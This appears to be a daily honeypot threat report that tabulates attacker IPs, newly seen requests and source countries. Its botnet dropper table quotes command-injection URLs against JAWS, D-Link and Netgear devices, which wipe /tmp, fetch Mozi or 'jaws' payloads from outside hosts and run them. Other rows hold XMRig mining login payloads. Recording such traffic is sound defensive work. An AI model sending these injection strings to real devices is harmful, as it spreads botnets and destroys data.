Daily Report: 2025-07-18#
Executive summary#
interaction report on http service of various Hhoneypot around the world.
- Executive summary
- OT report simplified
- Botnet dropper behaviour
- List of request
- List of country_iso_code
executive_summary#
In today’s repport, we detected 10 stage 1 IP address(es), linked to 3 dropper URL(s).
There are 25 new requests that have never been observed before (these were added to the monitored request database.).
A total of 757 requests were recorded during the day, originating from 10 different countries, with a peak of 162 requests coming from US.
ot_simplified_report#
simplified report for medium-level interactions with honeypots that mimic industrial systems (web site loading, or interactions with the website), for more contact us on social@shoggoth.industries.
source_country | targeted_country |
---|---|
US | Dubai |
botnet_dropper_behaviour#
remote_addr | request |
---|---|
39.108.173.165 | GET /shell?cd+/tmp;rm+-rf+*;wget+ scamanje.stresserit.pro/jaws;sh+/tmp/jaws HTTP/1.1 |
8.222.236.162 | GET /shell?cd+/tmp;rm+-rf+*;wget+ scamanje.stresserit.pro/jaws;sh+/tmp/jaws HTTP/1.1 |
8.219.133.204 | GET /shell?cd+/tmp;rm+-rf+*;wget+ scamanje.stresserit.pro/jaws;sh+/tmp/jaws HTTP/1.1 |
8.219.246.41 | GET /shell?cd+/tmp;rm+-rf+*;wget+ scamanje.stresserit.pro/jaws;sh+/tmp/jaws HTTP/1.1 |
139.196.172.210 | GET /shell?cd+/tmp;rm+-rf+*;wget+ scamanje.stresserit.pro/jaws;sh+/tmp/jaws HTTP/1.1 |
174.138.30.7 | GET /shell?cd+/tmp;rm+-rf+*;wget+ scamanje.stresserit.pro/jaws;sh+/tmp/jaws HTTP/1.1 |
8.219.188.210 | GET /shell?cd+/tmp;rm+-rf+*;wget+ scamanje.stresserit.pro/jaws;sh+/tmp/jaws HTTP/1.1 |
103.207.224.123 | 27;wget%20http://%s:%d/Mozi.m%20-O%20->%20/tmp/Mozi.m;chmod%20777%20/tmp/Mozi.m;/tmp/Mozi.m%20dlink.mips%27$ HTTP/1.0 |
103.93.93.162 | GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://103.93.93.162:47689/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 HTTP/1.0 |
8.222.203.73 | GET /shell?cd+/tmp;rm+-rf+*;wget+ scamanje.stresserit.pro/jaws;sh+/tmp/jaws HTTP/1.1 |
request#
The list of requests presented here are those that have not yet been yet integrated into the request database.
number_of_occurence | request | |
---|---|---|
68 | 2 | CONNECT ipscore.vexhub.dev:443 HTTP/1.1 |
148 | 1 | \x00\x0E\x081\xA7\x94\xED\x88\x834m\x00\x00\x00\x00\x00 |
149 | 1 | \x00\x0E81\xA7\x94\xED\x88\x834m\x00\x00\x00\x00\x00 |
158 | 1 | \x00\x0E\x08/\x11\xAE\x88}\x9D\xCD\xC5\x00\x00\x00\x00\x00 |
159 | 1 | \x00\x0E8/\x11\xAE\x88}\x9D\xCD\xC5\x00\x00\x00\x00\x00 |
184 | 1 | GET /odinhttpcall1752800331 HTTP/1.1 |
185 | 1 | GET /OdinHttpCall1752800331 HTTP/1.1 |
186 | 1 | GET /Odin/http/call1752800331 HTTP/1.1 |
191 | 1 | GET /odinhttpcall1752800381 HTTP/1.1 |
192 | 1 | GET /OdinHttpCall1752800381 HTTP/1.1 |
193 | 1 | GET /Odin/http/call1752800381 HTTP/1.1 |
208 | 1 | GET /v1/users/login HTTP/1.1 |
209 | 1 | GET /v1/users/users/login HTTP/1.1 |
211 | 1 | {\x22id\x22: 1, \x22method\x22: \x22mining.subscribe\x22, \x22params\x22: [], \x22jsonrpc\x22:\x222.0\x22} |
213 | 1 | {\x22id\x22: 1, \x22jsonrpc\x22: \x222.0\x22, \x22method\x22: \x22login\x22, \x22params\x22: { \x22login\x22: \x2248edfHu7V9Z84YzzMa6fUueoELZ9ZRXq9VetWzYGzKt52XU5xvqgzYnDK9URnRoJMk1j8nLwEVsaSWJ4fhdUyZijBGUicoD\x22, \x22pass\x22: \x22x\x22, \x22agent\x22: \x22XMRig/2.6.0-beta2 (Linux x86_64) libuv/1.8.0 gcc/5.4.0\x22}} |
215 | 1 | {\x22id\x22: 1, \x22method\x22: \x22eth_submitLogin\x22, \x22params\x22: []} |
217 | 1 | {\x22id\x22: 1, \x22method\x22: \x22mining.subscribe\x22, \x22params\x22: [\x22EthereumStratum/1.0.0\x22]} |
219 | 1 | {\x22id\x22: 1, \x22method\x22: \x22mining.hello\x22, \x22params\x22: {\x22agent\x22:\x22ethminer-0.17\x22,\x22host\x22:\x22xxx.xxx.xxx.xxx\x22, \x22port\x22:\x2250\x22,\x22proto\x22:\x22EthereumStratum/2.0.0\x22}} |
220 | 1 | \x00\x01\x00\x01\x00\x00\x00\x01\x00\x00\x00\x00 |
221 | 1 | \xFF\xFD\x01 |
231 | 1 | \x04\x01\x00P\xC4\xFBU>\x00 |
232 | 1 | CONNECT 196.251.85.62:80 HTTP/1.0 |
249 | 1 | {\x22id\x22:1,\x22method\x22:\x22eth_submitLogin\x22,\x22worker\x22:\x22igwrcvap\x22,\x22params\x22:[\x220x69f997ce12be08f803fd84931767c6c2aa3e9835\x22,\x22x\x22],\x22jsonrpc\x22:\x222.0\x22} |
250 | 1 | {\x22id\x22:1,\x22jsonrpc\x22:\x222.0\x22,\x22method\x22:\x22login\x22,\x22params\x22:{\x22login\x22:\x2249GZ6PaxC8S51isRNDEj3tTfPFosskEyvKccB4x1fHTeTiYRBSrJYDadWUV1UD9JQH5JVEGPSe2NTa81687NW4qQS13yqUF\x22,\x22pass\x22:\x22x\x22,\x22agent\x22:\x22XMRig/6.15.3 (Windows NT 10.0; Win64; x64) libuv/1.42.0 msvc/2019\x22,\x22algo\x22:[\x22cn/1\x22,\x22cn/2\x22,\x22cn/r\x22,\x22cn/fast\x22,\x22cn/half\x22,\x22cn/xao\x22,\x22cn/rto\x22,\x22cn/rwz\x22,\x22cn/zls\x22,\x22cn/double\x22,\x22cn/ccx\x22,\x22cn-lite/1\x22,\x22cn-heavy/0\x22,\x22cn-heavy/tube\x22,\x22cn-heavy/xhv\x22,\x22cn-pico\x22,\x22cn-pico/tlo\x22,\x22cn/upx2\x22,\x22rx/0\x22,\x22rx/wow\x22,\x22rx/arq\x22,\x22rx/graft\x22,\x22rx/sfx\x22,\x22rx/keva\x22,\x22argon2/chukwa\x22,\x22argon2/chukwav2\x22,\x22argon2/ninja\x22,\x22astrobwt\x22]}} |
268 | 1 | \x0F\x00\x00\x00G\xC40~\x97\x01\x00\x00\xCA\x01\xB4 |
country_iso_code#
number_of_occurence | country_iso_code | |
---|---|---|
0 | 162 | US |
1 | 99 | DE |
2 | 66 | PL |
3 | 62 | SG |
4 | 47 | NL |
5 | 45 | SE |
6 | 44 | GB |
7 | 35 | HK |
8 | 31 | BG |
9 | 24 | ES |
10 | 22 | JP |
11 | 19 | CA |
12 | 17 | NG |
13 | 14 | IN |
14 | 9 | PT |
15 | 7 | BE |
16 | 7 | CN |
17 | 6 | SC |
18 | 4 | IR |
19 | 3 | KZ |
20 | 3 | IE |
21 | 3 | HU |
22 | 2 | CO |
23 | 2 | ZA |
24 | 2 | RU |
25 | 2 | RO |
26 | 2 | KR |
27 | 2 | AU |
28 | 1 | MC |
29 | 1 | CR |
30 | 1 | FI |
31 | 1 | BD |
32 | 1 | KH |
33 | 1 | GR |
34 | 1 | AZ |
35 | 1 | AR |
36 | 1 | BR |
37 | 1 | FR |
38 | 1 | IL |
39 | 1 | ID |
40 | 1 | MX |
41 | 1 | AO |
42 | 1 | IQ |
43 | 1 | LT |